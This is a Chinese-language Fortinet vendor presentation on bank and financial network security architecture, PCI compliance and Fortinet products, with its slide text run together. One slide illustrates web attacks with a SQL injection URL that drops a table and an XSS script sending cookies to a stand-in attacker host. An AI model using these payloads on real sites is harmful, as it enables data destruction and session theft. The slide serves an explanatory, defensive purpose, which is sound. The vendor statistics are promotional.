金融系統(tǒng)安全解決架構(gòu)

1July,2009建設(shè)高校綠色網(wǎng)絡(luò)應(yīng)用安全架構(gòu)建設(shè)金融網(wǎng)絡(luò)應(yīng)用安全架構(gòu)2內(nèi)容安排

Fortinet安全產(chǎn)品系列5銀行應(yīng)用網(wǎng)絡(luò)安全部署2銀行網(wǎng)絡(luò)安全區(qū)域架構(gòu)分析3統(tǒng)一安全的行業(yè)技術(shù)發(fā)展方向4

1國際行業(yè)安全形勢及PCI規(guī)范

6Fortinet公司安全服務(wù)3用戶面臨的安全威脅正日益增長3惡意軟件指數(shù)級的增長（單位：千）美國國防部報告的惡意網(wǎng)絡(luò)行為（單位：千）HackersBreachHeartlandPaymentCreditCardSystem(1/20/2009)“HeartlandPaymentSystems(HPY)disclosedthatintrudershackedintothe

computersitusestoprocess100millionpaymentcardtransactionspermonthfor175,000merchants…”ElectricityGridinU.S.PenetratedbySpies(4/8/2009)“CyberspieshavepenetratedtheU.S.electricalgridandleftbehindsoftwareprogramsthatcouldbeusedtodisruptthesystem,accordingtocurrentandformernational-securityofficials...”U.S.SouthKoreaInvestigatePossibleNorthKoreanCyberAttack(7/8/2009)“Aseriesofcoordinatedattacksongovernmentandfinancialwebsitesstarted

aroundthesametimeNorthKoreatestednewmissilesandfacedfreshsanctions…”混合型攻擊現(xiàn)在成為主流檢測層次需要提升

性能壓力增強(qiáng)攻擊的動機(jī)從吸引注意力轉(zhuǎn)向經(jīng)濟(jì)利益網(wǎng)絡(luò)安全的重要性越來越高4用戶的商業(yè)安全需求日益提高4企業(yè)數(shù)據(jù)中心的網(wǎng)絡(luò)吞吐量10MB100MB1GBMulti-GB10GB企業(yè)的信息安全需要遵循更多的一致性要求一致性要求既來自于政府頒布的法律法規(guī)，也會來自于行業(yè)規(guī)定或商業(yè)伙伴的要求IT預(yù)算收縮安全開銷增加網(wǎng)絡(luò)需求正不斷加速安全需求也需要與之匹配SOX404FISMAHIPAA2009至2010年IT服務(wù)花銷變化EUDataProtectionDirective5國際化的行業(yè)數(shù)據(jù)漏洞和破壞“AtlantisResort

報告數(shù)據(jù)被偷影響了

55,000

客戶”“Marriott丟失了存有206,000個客戶個人信息的備份磁帶”“CardSystemsSolutions公司4000萬張信用卡被破解，其中包括1390萬張萬事達(dá)信用卡和2200萬張Visa信用卡“GuidanceSoftware報告有漏洞”“WellsFargoBank報告被偷的計算機(jī)上包含私人數(shù)據(jù)”“LexisNexis被黑的數(shù)據(jù)庫包含

310,000

客戶信息”“BankofAmericalooses丟失的備份磁帶內(nèi)存有1200萬聯(lián)邦數(shù)據(jù)”數(shù)據(jù)安全漏洞還在上升...5000萬客戶受到影響!!應(yīng)用系統(tǒng)漏洞都已經(jīng)防護(hù)了嗎?未報道的那些漏洞會怎么樣呢?這些數(shù)據(jù)為什么會受到攻擊?6FortinetConfidential

在過去3年中，數(shù)據(jù)竊取者增加了650%—CSI/FBI51%以上的破壞行為并未被告知公司中的每一名員工。

—CIO平均每起內(nèi)部攻擊導(dǎo)致的經(jīng)濟(jì)損失為270萬美元。

—CSI/FBI調(diào)查報告20%以上的金融公司都遭受過數(shù)據(jù)破壞行為。

—EvansDataCorp金融行業(yè)信息安全威脅的現(xiàn)狀78%以上攻擊者都是授權(quán)用戶：如公司員工、設(shè)備或第三方服務(wù)提供商等。-CERT/SecretService7完善的安全防御覆蓋能力（數(shù)據(jù)安全，傳輸安全，內(nèi)容安全等）動態(tài)安全的服務(wù)能力（自動適應(yīng)性更新）

行業(yè)IT安全法規(guī)的遵從（PCI，CISP，SOX,FSA等）減少IT安全風(fēng)險，降低IT管理資源穩(wěn)定的性能和高效運(yùn)營能力簡單的部署方式和靈活的網(wǎng)絡(luò)適應(yīng)性完整的產(chǎn)品部署解決方案和未來平滑升級支持國際金融行業(yè)IT安全建設(shè)重點(diǎn)動態(tài)威脅安全防御能力良好的投資回報性能復(fù)合型安全效能回報

降低TCO總體投入和維護(hù)成本保護(hù)綠色能源遵從綠色能源消耗優(yōu)化物理空間節(jié)約業(yè)務(wù)穩(wěn)定性保持8國際金融行業(yè)IT安全規(guī)范PCI成立于2004年12月，由5家最頂尖的信用卡行業(yè)組織發(fā)起發(fā)布了PCIDSS，使各企業(yè)自有的安全策略保持一致標(biāo)準(zhǔn)制定是為了確保在企業(yè)存儲、處理、傳輸持卡人數(shù)據(jù)時，應(yīng)滿足最低級別的安全風(fēng)險金融處理信用卡信息時，必須遵從新的PCI標(biāo)準(zhǔn)2008年10月發(fā)布1.2版本建立從網(wǎng)絡(luò)層，內(nèi)容層到應(yīng)用層的體系安全結(jié)構(gòu)強(qiáng)調(diào)防范常見的編碼漏洞，特別是OWASP（開放的web業(yè)務(wù)服務(wù)安全組織）中定義的漏洞編碼檢查或確保在公開的Web應(yīng)用前部署Web應(yīng)用防火墻，以檢測并阻止基于Web的攻擊。

增強(qiáng)合規(guī)企業(yè)的信譽(yù)，降低安全風(fēng)險，是現(xiàn)代金融企業(yè)安全標(biāo)準(zhǔn)Fortinet是PCI安全標(biāo)準(zhǔn)委員會的成員之一(2009年10月6日)99CISP/PCI安全規(guī)范遵從方案PCI數(shù)據(jù)安全標(biāo)準(zhǔn)描述Fortinet解決方案構(gòu)建并維護(hù)安全網(wǎng)絡(luò)安裝并維護(hù)防火墻配置以保護(hù)持卡人數(shù)據(jù)不使用供應(yīng)商缺省設(shè)置的系統(tǒng)密碼和其他安全參數(shù)FortiGate集成的防火墻功能FortiDB漏洞評估管理和審計保護(hù)持卡人數(shù)據(jù)保護(hù)存儲的持卡人數(shù)據(jù)加密通過公共網(wǎng)絡(luò)傳輸?shù)某挚ㄈ藬?shù)據(jù)和敏感性信息FortiGate集成的VPN功能FortiWebweb應(yīng)用安全網(wǎng)關(guān)維護(hù)漏洞管理計劃使用反病毒軟件并定期更新開發(fā)、維護(hù)安全系統(tǒng)和應(yīng)用程序FortiGate集成病毒網(wǎng)關(guān)FortiClient桌面反病毒FortiDB數(shù)據(jù)庫漏洞管理和審計Fortinet具有成本效益的金融機(jī)構(gòu)類產(chǎn)品幫助金融機(jī)構(gòu)匹配和維持CISP/PCI法規(guī)1010PCI數(shù)據(jù)安全標(biāo)準(zhǔn)描述Fortinet解決方案實(shí)施可靠的訪問控制措施只有具備業(yè)務(wù)需求的人才能訪問持卡人數(shù)據(jù)為每位擁有計算機(jī)訪問權(quán)限的用戶分配唯一的ID嚴(yán)格限制對持卡人數(shù)據(jù)的物理訪問FortiGate

安全用戶認(rèn)證授權(quán)FortiDB數(shù)據(jù)庫權(quán)限審計定期監(jiān)控和測試網(wǎng)絡(luò)跟蹤和監(jiān)控訪問網(wǎng)絡(luò)資源和持卡人數(shù)據(jù)的所有操作定期測試安全系統(tǒng)和流程FortiAnalyzer

網(wǎng)絡(luò)日志報告審計，F(xiàn)ortiDB漏洞評估掃描和審計維護(hù)信息安全策略維護(hù)針對信息安全的策略FortiManager

集中管理設(shè)備Fortinet具有成本效益的金融機(jī)構(gòu)類產(chǎn)品幫助金融機(jī)構(gòu)匹配和維持CISP/PCI法規(guī)CISP/PCI安全規(guī)范遵從方案11FortinetConfidental保密文件11現(xiàn)代金融系統(tǒng)三維安全架構(gòu)特點(diǎn)VPN數(shù)據(jù)加密VPN提供了數(shù)據(jù)安全加密和傳輸通道

網(wǎng)絡(luò)防火墻防火墻提供了網(wǎng)絡(luò)層區(qū)域威脅防御體系

防病毒網(wǎng)關(guān)/DLP

檢測/阻止病毒/木馬和惡意代碼安全信息泄漏保護(hù)IPS入侵防御IDC網(wǎng)絡(luò)服務(wù)器系統(tǒng)監(jiān)控網(wǎng)絡(luò)行為和系統(tǒng)安全警告

Web前置安全檢測Web接口應(yīng)用的滲透性不規(guī)范訪問安全

數(shù)據(jù)庫安全業(yè)務(wù)后臺數(shù)據(jù)安全評估和訪問安全審計業(yè)務(wù)應(yīng)用安全網(wǎng)絡(luò)連接安全系統(tǒng)內(nèi)容安全12網(wǎng)絡(luò)應(yīng)用的變化Page12|

Collaboration/Media

防火墻只基于網(wǎng)絡(luò)和端口的檢測的脆弱性問題…新型應(yīng)用的發(fā)展逐漸多樣化Ports≠ApplicationsIPAddresses

≠

UsersProblem:ITCan’tSafelyEnableInternetApplicationsSaaSPersonal安全威脅從網(wǎng)絡(luò)層擴(kuò)展到應(yīng)用層13從戰(zhàn)略發(fā)展角度來考慮IT安全建設(shè)問題？面向未來考慮您的安全基礎(chǔ)構(gòu)架先于威脅的變化立體安全威脅的自動化更新防御建立統(tǒng)一鞏固的安全體系，而非逐點(diǎn)式部署降低復(fù)雜性增強(qiáng)保護(hù)能力減少風(fēng)險降低資本性支出和運(yùn)營成本從系統(tǒng)結(jié)構(gòu)角度部署應(yīng)對安全威脅到2010年為止，只有10%

的安全威脅會被單一功能安全產(chǎn)品發(fā)現(xiàn)，而在2005年這個數(shù)字還是80%。

Source:Gartner““*Gartner:CostCuttingWhileImprovingITSecurity,March20,200814安全的復(fù)雜技術(shù)考慮防火墻安全管理安全監(jiān)控系統(tǒng)攻擊IPS病毒/蠕蟲數(shù)據(jù)泄漏網(wǎng)站過濾數(shù)據(jù)加密傳輸郵件安全應(yīng)用控制三層路由廣域傳輸優(yōu)化15Fortinet提供戰(zhàn)略性安全服務(wù)綜合安全解決方案集成的戰(zhàn)略安全結(jié)構(gòu)統(tǒng)一的安全威脅管理更低的TCO降低復(fù)雜性和管理難度簡化實(shí)施和配置實(shí)時安全防御

24×7全球安全更新集中云式服務(wù)體系靈活部署

適應(yīng)客戶的時間表和預(yù)算基于客戶的特性服務(wù)16第三方系統(tǒng)內(nèi)部數(shù)據(jù)交換區(qū)EAI,UDI,CCIWeb前置機(jī)業(yè)務(wù)應(yīng)用系統(tǒng)數(shù)據(jù)庫系統(tǒng)業(yè)務(wù)管理數(shù)據(jù)庫應(yīng)用平臺集中管理和審計安全分析DNSSMTPFTPProxy集中管理區(qū)內(nèi)網(wǎng)應(yīng)用和數(shù)據(jù)區(qū)OCRM,BDBWeb前置機(jī)業(yè)務(wù)應(yīng)用服務(wù)器數(shù)據(jù)庫系統(tǒng)網(wǎng)銀服務(wù)器系統(tǒng)公共E-Banking系統(tǒng)OA辦公區(qū)核心區(qū)互聯(lián)網(wǎng)區(qū)銀行業(yè)務(wù)局域網(wǎng)區(qū)域安全區(qū)結(jié)構(gòu)internet17OA辦公區(qū)網(wǎng)管區(qū)域內(nèi)部業(yè)務(wù)區(qū)電子銀行業(yè)務(wù)區(qū)企業(yè)客戶寬帶家庭用戶惡意訪問移動用戶InternetIntranet銀行業(yè)務(wù)廣域網(wǎng)區(qū)域安全區(qū)結(jié)構(gòu)18內(nèi)部用戶訪問外網(wǎng)的策略控制問題內(nèi)部用戶安全區(qū)域間的訪問隔離需要內(nèi)部用戶訪問internet的病毒/色情網(wǎng)頁問題內(nèi)部用戶多線程應(yīng)用程序的帶寬耗盡問題平衡單用戶的流量均衡問題內(nèi)部用戶上網(wǎng)的安全審計問題用戶主機(jī)的僵尸網(wǎng)絡(luò)感染問題用戶主機(jī)的非主動性垃圾流量會話攻擊問題基于用戶帳號的授權(quán)策略問題病毒/蠕蟲防火墻安全監(jiān)控

OA辦公網(wǎng)絡(luò)的威脅分析Web過濾郵件過濾混合型威脅及新應(yīng)用帶來的問題總部惡意網(wǎng)頁蠕蟲病毒間諜軟件

P2P、IM應(yīng)用垃圾郵件網(wǎng)頁欺騙木馬軟件……DMZ服務(wù)器區(qū)internet20OA辦公網(wǎng)安全部署internetICSA國際計算機(jī)組織認(rèn)證防病毒網(wǎng)關(guān)22多協(xié)議檢測方式企業(yè)網(wǎng)絡(luò)資源網(wǎng)頁/郵件/文件傳誦/聊天公共網(wǎng)絡(luò)資源互連網(wǎng)

01010101010101010010111011高性能的芯片加速防病毒引擎FortiASIC-CP

(內(nèi)容處理器)特征匹配防病毒IPS內(nèi)容過濾加密解密VPN協(xié)商密鑰維護(hù)FortiASIC-NP

(網(wǎng)絡(luò)處理器)高速包轉(zhuǎn)發(fā)線速防火墻IPSecVPNNAT防DoS攻擊流量整形Source: FortiGuardPrevalenceReport, 30daysTop10MalwareinCanadathroughApril21,2007全球部署的安全監(jiān)控制體系VB100病毒安全掃描認(rèn)證26外聯(lián)業(yè)務(wù)的對象策略控制問題外聯(lián)業(yè)務(wù)的安全傳輸問題外聯(lián)流量的系統(tǒng)層威脅問題外聯(lián)流量的惡意垃圾擁塞問題外聯(lián)業(yè)務(wù)的數(shù)據(jù)流傳輸優(yōu)化問題外聯(lián)業(yè)務(wù)的虛擬化通道隔離業(yè)務(wù)流量中的蠕蟲/木馬入侵式威脅業(yè)務(wù)流量監(jiān)控系統(tǒng)攻擊IPS病毒/蠕蟲防火墻安全監(jiān)控外聯(lián)業(yè)務(wù)網(wǎng)絡(luò)的威脅分析傳輸優(yōu)化數(shù)據(jù)加密27外聯(lián)業(yè)務(wù)虛擬安全隧道部署Intranet分支銀行分支銀行營業(yè)所營業(yè)所業(yè)務(wù)虛擬安全隧道接入28網(wǎng)銀業(yè)務(wù)的安全分析Web應(yīng)用是業(yè)務(wù)的主要平臺49%的Web應(yīng)用包含高風(fēng)險級別的漏洞，很容易被自動工具探測攻擊80%-96%的Web應(yīng)用包含有易被黑客攻擊的漏洞99%的Web應(yīng)用不合乎PCIDSS規(guī)范現(xiàn)有的網(wǎng)絡(luò)層檢測技術(shù)不能防范大多數(shù)常見的漏洞攻擊跨站腳本

SQL注入信息泄漏HTTP回應(yīng)截斷攻擊的商業(yè)影響：減少收入–每丟失一條記錄損失$300不合規(guī)的處罰損害企業(yè)聲譽(yù)基于web交互界面入侵后臺數(shù)據(jù)庫系統(tǒng)是目前主流的威脅方式國際行業(yè)專業(yè)組織OWASP/Webappsec專注于web應(yīng)用安全的分析29Web應(yīng)用安全威脅分析最流行的威脅類型最常見的應(yīng)用弱點(diǎn)(/projects/statistics/)

Slide293080端口HTTP請求http://XX.XX.XX.XXX/web/n2/productview.asp?id=97;drop%20table%20Card_kevin交換機(jī)防火墻Web服務(wù)器DB數(shù)據(jù)庫Select*fromproductwhereid=97Droptablecard_kevin命令已執(zhí)行成功<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>跨站腳本/SQL注入式攻擊Intranet31OWASP開放web應(yīng)用服務(wù)安全組織漏洞描述A1-跨站腳本CrossSiteScripting(XSS) 當(dāng)應(yīng)用程序提取用戶提供的數(shù)據(jù)并發(fā)送到Web瀏覽器，數(shù)據(jù)內(nèi)容沒有先經(jīng)過驗(yàn)證或編碼時，可能出現(xiàn)的XSS漏洞。XSS允許攻擊者在受害者的瀏覽器上執(zhí)行腳本，腳本可能會劫持用戶會話、破壞Web站點(diǎn)或引入蠕蟲等。A2–注入攻擊InjectionFlaws注入漏洞，特別是SQL注入，通過在Web應(yīng)用程序內(nèi)。當(dāng)用戶提供的數(shù)據(jù)作為命令或查詢的一部分被發(fā)送到解釋器時，可能出現(xiàn)注入漏洞。攻擊者的惡意數(shù)據(jù)欺騙翻譯器執(zhí)行非用戶本意的命令或改變數(shù)據(jù)。A3–惡意文件執(zhí)行MaliciousFileExecution遠(yuǎn)程文件包含(RFI)代碼缺陷允許攻擊者包含惡意代碼和數(shù)據(jù)，導(dǎo)致破壞性的攻擊，如全部服務(wù)器被攻陷。惡意文件執(zhí)行攻擊會影響PHP、XML以及任意從用戶接收文件名或文件的架構(gòu)。A4–不安全的直接對象引用InsecureDirectObjectReference當(dāng)開發(fā)人員把一個引用暴露給內(nèi)部執(zhí)行對象時，如一個文件、目錄、數(shù)據(jù)庫記錄或鍵值、URL或格式參數(shù)，可能發(fā)生直接對象引用。攻擊者可以操縱這些引用訪問其它未經(jīng)認(rèn)證的對象。A5–跨站請求偽造CrossSiteRequestForgery(CSRF)CSRF攻擊強(qiáng)制登錄用戶的瀏覽器發(fā)送經(jīng)過預(yù)先認(rèn)證的請求到一個有漏洞的Web應(yīng)用程序，接著強(qiáng)制受害者的瀏覽器執(zhí)行一個對攻擊者有利的惡意行為。CSRF能和它所攻擊的Web應(yīng)用程序一樣有效。A6–信息泄漏及不正確的錯誤操作InformationLeakageandImproperErrorHandling應(yīng)用程序可能通過各種應(yīng)用程序問題非用戶本意的泄漏配置、內(nèi)部結(jié)構(gòu)或隱私等信息。攻擊者利用這個弱點(diǎn)偷竊敏感數(shù)據(jù)或傳入更多嚴(yán)重的攻擊。A7–失效認(rèn)證及會話管理BrokenAuthenticationandSessionManagement信任賬戶及會話令牌通過沒有被完全的保護(hù)。攻擊者使用密碼、密鑰或認(rèn)證令牌偽裝其它用戶的身份。A8–不安全的密碼存儲InsecureCryptographicStorageWeb應(yīng)用程序很少能適當(dāng)?shù)氖褂妹艽a功能來保護(hù)數(shù)據(jù)和credential。攻擊者通過缺乏有效保護(hù)的數(shù)據(jù)來竊取身份及其它犯罪行為，如信用卡欺詐。A9–不安全的通信InsecureCommunications敏感數(shù)據(jù)需要被保護(hù)，而應(yīng)用程序經(jīng)常沒有對網(wǎng)絡(luò)流量進(jìn)行加密。A10–限制URL訪問失效FailuretoRestrictURLAccess通常，應(yīng)用程序只能通過對非認(rèn)證用戶鏈拉或URL的顯示來保護(hù)敏感功能。攻擊者能利用這個弱點(diǎn)，通過直接訪問URL來訪問并執(zhí)行未授權(quán)的操作。32后臺數(shù)據(jù)庫的安全與規(guī)范目標(biāo)數(shù)據(jù)庫與利潤相關(guān)的特定目標(biāo)數(shù)據(jù)大量的經(jīng)由互聯(lián)網(wǎng)和應(yīng)用程序的訪問整合度越大，體現(xiàn)出的價值越大數(shù)據(jù)庫數(shù)據(jù)遭到破壞而導(dǎo)致的損失接近每條$200*檢測/擴(kuò)大，通告，商業(yè)損失2005-2007，有將近1億5000萬的數(shù)據(jù)庫數(shù)據(jù)記錄丟失來自于內(nèi)部人員的安全威脅只保障邊界網(wǎng)絡(luò)安全是不夠的高權(quán)限用戶引起的安全威脅占78%*，職責(zé)分離*來源:Ponemon研究所33內(nèi)部用戶合法權(quán)限濫用權(quán)限盜用越權(quán)濫用權(quán)限分配不當(dāng)臨時帳號未及時清理備份數(shù)據(jù)缺乏保護(hù)離職員工的后門合作伙伴合法權(quán)限濫用權(quán)限盜用越權(quán)濫用后門程序DB2/SQL/Oracle/Sybase數(shù)據(jù)庫軟件數(shù)據(jù)庫平臺漏洞通訊協(xié)議漏洞弱鑒權(quán)機(jī)制日志缺失或不完整

4W：-是誰，做了什么-什么時候，在哪里跟蹤：-登錄-數(shù)據(jù)/文件訪問-數(shù)據(jù)/文件變化-模式變化-日志竄改-人為錯誤-可疑的活動-自定義事件數(shù)據(jù)庫安全審計規(guī)范34網(wǎng)銀服務(wù)區(qū)安全部署外部用戶網(wǎng)銀服務(wù)器數(shù)據(jù)庫/LDAP服務(wù)器Web門戶系統(tǒng)Web安全防護(hù)設(shè)備InternetIntranet數(shù)據(jù)庫監(jiān)控設(shè)備Web注入攻擊數(shù)據(jù)庫攻擊數(shù)據(jù)庫攻擊Web應(yīng)用安全檢測XML內(nèi)容語言檢測SSL/XML加速Web負(fù)載均衡專業(yè)硬件芯片技術(shù)多種應(yīng)用簽名技術(shù)漏洞掃描監(jiān)控與審計支持多種數(shù)據(jù)庫安全補(bǔ)救措施建議跟蹤軌跡預(yù)配置報告類型Web安全數(shù)據(jù)庫安全I(xiàn)nteret35圖形報告攻擊審計日志36虛擬化業(yè)務(wù)服務(wù)器群安全分析固定對象和應(yīng)用訪問的策略控制問題訪問會話的攻擊性泛濫壓力拒絕服務(wù)的資源性攻擊壓力系統(tǒng)層弱點(diǎn)探測攻擊的問題基于訪問者的流量控制問題畸形數(shù)據(jù)包重組的協(xié)議層壓力業(yè)務(wù)的長連接保持問題虛擬化安全策略配置問題蠕蟲/木馬入侵式威脅系統(tǒng)攻擊IPS病毒/蠕蟲防火墻安全監(jiān)控37虛擬化業(yè)務(wù)服務(wù)器集群虛擬業(yè)務(wù)服務(wù)區(qū)一防火墻虛擬策略工作模式安全配置:AV安全配置:AS安全配置:WCF安全配置;IPS路由業(yè)務(wù)安全策略組安全配置:TS安全審計策略組業(yè)務(wù)服務(wù)器集群區(qū)安全部署核心交換機(jī)安全網(wǎng)關(guān)安全網(wǎng)關(guān)核心交換機(jī)InternetIntranet38統(tǒng)一安全管理監(jiān)控系統(tǒng)

分支銀行

分支銀行

移動用戶

IntranetInternetOA辦公區(qū)網(wǎng)管區(qū)域內(nèi)部業(yè)務(wù)區(qū)電子銀行業(yè)務(wù)區(qū)安全掃描管理審計39安全集中統(tǒng)計報表超過300個報表模版報表設(shè)置向?qū)蟊硗耆啥ㄖ茍蟊硎纠录?攻擊基于:

設(shè)備

來源

類別

威脅名稱

協(xié)議郵件使用率Web使用率帶寬使用率協(xié)議使用率

40安全集中監(jiān)控中心41Fortinet公司概況全球領(lǐng)先的專業(yè)整合安全技術(shù)提供商專業(yè)網(wǎng)絡(luò)安全廠商2000年成立1200+名員工/超過500+工程發(fā)展最快的專業(yè)安全公司全球化的銷售服務(wù)體系(美國，歐洲，亞洲)華爾街業(yè)績增長最好的公司之一FTNT(IPO)權(quán)威的安全認(rèn)證6項(xiàng)ICSA(計算機(jī)安全實(shí)驗(yàn)室）認(rèn)證最高級政府安全認(rèn)證(FIPS-2,

CommonCriteriaEAL4+)100+安全行業(yè)認(rèn)證ISO9001認(rèn)證美國病毒專業(yè)評測試VB100認(rèn)證

歐洲專業(yè)IPS安全評測NSS認(rèn)證Frost&Sullivan/IDC全球最大的整合性安全廠家42為全球運(yùn)營商提供增值安全服務(wù)43金融行業(yè)客戶4444安全市場分額報告IDCQuarterlyApplianceTracker,June2009(basedonrevenues)Gartner,Inc.,“1H09MultiFunctionFirewallMagicQuadrant”byG.YoungandA.Hils,JuneX,2009.2007Frost&SullivanAwardfor“MarketLeadershipinUTM”and“GlobalCompetitiveStrategyLeadershipoftheYear"SourceIDC報告整合性安全市場

Gartner報告多功能防火墻市場Frost&Sullivan報告整合性安全市場45全球整合性安全市場的發(fā)展趨勢45

2008 2009 2010 2011 2012 2013Firewall&VPNUTM(-0.5%)CAGR$2.2$2.1$inbillions13.8%CAGR$1.7$3.2Source:IDC“WorldwideNetworkSecurity2008-2012Forecastand2007VendorShares:Transitions–AppliancesAreMoreThanMeetstheEye”46國內(nèi)UTM整合性安全市場的發(fā)展47Fortinet統(tǒng)一網(wǎng)絡(luò)安全解決方案

應(yīng)用層安全FortiGate七層UTM安全網(wǎng)關(guān)安全云服務(wù)FortiGuard實(shí)時安全云服務(wù)網(wǎng)絡(luò)FortiMail郵件交付安全FortiWebWeb服務(wù)安全主機(jī)訪問安全FortiClient主機(jī)安全FortiScan資產(chǎn)安全管理FortiDB數(shù)據(jù)安全審計

邊界網(wǎng)關(guān)安全數(shù)據(jù)庫安全FortiManager集中安全管理FortiAnalyzer集中安全審計統(tǒng)一安全管理48旗艦產(chǎn)品：FortiGate安全網(wǎng)關(guān)系列平臺遠(yuǎn)程分支桌面級中低端產(chǎn)品線中高端產(chǎn)品線高端產(chǎn)品線FG5000FG30B-80CMFG110C-620BFG5000

FG1240B-3810A反垃圾郵件應(yīng)用控制防火墻流量控制VPN防病毒IPSWeb過濾SSL加速DLPWAN優(yōu)化無線支持NAC終端控制49技術(shù)特點(diǎn)：分布式安全到集中式管理的演變49Fortinet解決方案傳統(tǒng)分布式安全設(shè)計集中式的部署和管理，專用硬件設(shè)計結(jié)構(gòu)，一站式安全防御技術(shù)TCO成本投入低，安全效能高易于部署和維護(hù)，符合綠色I(xiàn)T建設(shè)規(guī)范安全產(chǎn)品分類過多，管理繁瑣

安全防御效果差，安全問題難于定位總體投資成本過高產(chǎn)品部署和維護(hù)對當(dāng)前網(wǎng)絡(luò)影響明顯50

技術(shù)特點(diǎn)：為IT網(wǎng)絡(luò)提供一站式安全防御50“危險的”視頻鏈接：重定向至惡意網(wǎng)站W(wǎng)eb過濾阻擋對惡意網(wǎng)站的訪問網(wǎng)絡(luò)防病毒阻止病毒下載入侵防御阻止蠕蟲的傳播FIREWALL

主機(jī)感染后外部散播在系統(tǒng)中不斷復(fù)制自身，并試圖擴(kuò)散WEBFILTERINGANTIVIRUS“惡意”文件滲透：下載惡意文件INTRUSIONPROTECTION

PORT80一站攔截多樣化安全威脅應(yīng)用層防火墻安全過濾不同應(yīng)用51

產(chǎn)品硬件結(jié)構(gòu)特色：NP+ASIC52業(yè)界UTM安全網(wǎng)關(guān)的功能比較52PartnerSuppliedInternallyDevelopedNotavailable53業(yè)界UTM安全網(wǎng)關(guān)的業(yè)界認(rèn)證比較53SomeproductsarecertifiedPassedCertificationnotconducted54FortiGateUTM安全網(wǎng)關(guān)功能概述防火墻/VPN策略控制模塊集中安全策略管理/日志報表審計平臺FortiManager/FortiAnalyzer病毒/垃圾郵件/攻擊庫/web庫升級中心DOS/IPS系統(tǒng)攻擊保護(hù)模塊病毒/間諜軟件/蠕蟲安全模塊垃圾郵件保護(hù)模塊IM/P2P應(yīng)用控制模塊網(wǎng)頁過濾安全

模塊

廣域網(wǎng)加速模塊DLP數(shù)據(jù)弱點(diǎn)保護(hù)55多種語言的web管理設(shè)計符合IT管理規(guī)范5556安全模塊:策略配置企業(yè)網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)個體互連網(wǎng)57認(rèn)證模塊:靈活的用戶認(rèn)證ClientSTOP!用戶訪問服務(wù)器資源時，先進(jìn)行認(rèn)證，輸入正確的用戶名密碼才可以繼續(xù)訪問管理員進(jìn)行服務(wù)器管理員工訪問辦公系統(tǒng)合作伙伴訪問相應(yīng)資源對不同用戶設(shè)置不同的訪問權(quán)限支持認(rèn)證方式本地、Radius、LDAP、SecurID、WindowsAD、PKI證書58安全模塊:病毒防御應(yīng)用企業(yè)網(wǎng)絡(luò)資源網(wǎng)頁/郵件/文件傳誦/聊天公共網(wǎng)絡(luò)資源互連網(wǎng)高性能的ASIC芯片硬件加速防病毒引擎FortiASIC-CP

(內(nèi)容處理器)特征匹配防病毒IPS內(nèi)容過濾加密解密VPN協(xié)商密鑰維護(hù)FortiASIC-NP

(網(wǎng)絡(luò)處理器)高速包轉(zhuǎn)發(fā)線速防火墻IPSecVPNNAT防DoS攻擊流量整形支持多種網(wǎng)絡(luò)協(xié)議的病毒過濾HTTP、FTPSMTP、POP3、IMAPIM、NNTP、CIFS支持協(xié)議使用非標(biāo)準(zhǔn)端口可對SSL加密流量進(jìn)行病毒過濾攔截客戶機(jī)和服務(wù)器之間的通信攔截SSL握手時傳輸?shù)暮戏荑€，并進(jìn)行替換。以客戶機(jī)身份與服務(wù)器通信以服務(wù)器身份與客戶機(jī)通信支持HTTPS、SMTPS、POP3S、IMAPS病毒檢測方式基于病毒特征目前能檢測的病毒種類為100萬種以上支持多級病毒庫支持流掃描方式完整覆蓋Wildlist病毒庫每天4次更新病毒庫宏病毒檢測基于病毒行為啟發(fā)式掃描壓縮文件掃描支持多種壓縮格式100層壓縮性能與安全的平衡可根據(jù)安全級別和性能需求，選擇4種不同級別的病毒庫。權(quán)威的防病毒認(rèn)證ICSA防病毒認(rèn)證VB100防病毒認(rèn)證FortiGuard更新服務(wù)FortiGuard全球分布式服務(wù)器-自動地實(shí)現(xiàn)病毒庫升級，可以在10分鐘內(nèi)到達(dá)所有的FortiGate設(shè)備-自動、手動、推送式更新-支持在線及離線方式更新-每天4次更新病毒庫本土化服務(wù)（北京研發(fā)中心，200+工程師）FortiGuard中心

網(wǎng)站和郵件公告點(diǎn)業(yè)界領(lǐng)先的病毒庫更新速度文件大小過濾超大文件過濾可選擇處理方式–通過或阻斷文件類型過濾文件名*.exe等文件類型可執(zhí)行文件等（可防止修改文件擴(kuò)展名逃避檢查）間諜軟件/惡意軟件過濾病毒攔截提示報警蠕蟲病毒防御-IPS病毒進(jìn)入內(nèi)網(wǎng)后往往不再以文件形式通過Internet應(yīng)用協(xié)議傳播可通過IPS方式阻擋蠕蟲病毒的傳播防病毒與IPS的界限越來越模糊蠕蟲病毒防御–會話監(jiān)視蠕蟲病毒防御–會話排名蠕蟲病毒防御-會話限制會話限制TCPUDPICMP防御蠕蟲病毒產(chǎn)生的DoS病毒傳播媒介防御-惡意網(wǎng)頁及垃圾郵件降低惡意網(wǎng)頁和垃圾郵件傳播病毒的風(fēng)險FortiGuard分類過濾76類，5000多萬個網(wǎng)站實(shí)時更新數(shù)據(jù)庫URL過濾黑白名單Email地址及IP地址過濾關(guān)鍵字過濾支持多種語言腳本過濾ActiveXJavaAppletCookies隔離病毒及入侵者隔離IP地址隔離IP組合隔離源接口定時自動釋放手工釋放77安全模塊:IPS/NAC隔離攻擊者支持DOS攻擊防御和會話控制IPS特征庫支持3000攻擊特征,24X7升級服務(wù)自動隔離攻擊者源地址、源及目的地址、來源接口防止之后可能的持續(xù)攻擊徹底阻斷，而非僅僅檢測到的端口可以設(shè)置隔離時間互連網(wǎng)公共網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)個體企業(yè)網(wǎng)絡(luò)資源

01010101010101010010111011

0101010101010101001011101101010101010101010101010101010101078安全模塊:網(wǎng)頁內(nèi)容過濾FortiGuardweb過濾庫；82個類別控制；超過4000萬個URL；實(shí)時數(shù)據(jù)庫更新79安全模塊:網(wǎng)頁的過濾應(yīng)用網(wǎng)絡(luò)訪問的內(nèi)容控制支持WEB內(nèi)容關(guān)鍵字過濾屏蔽具有政治或敏感的網(wǎng)頁內(nèi)容BBS論壇內(nèi)容控制

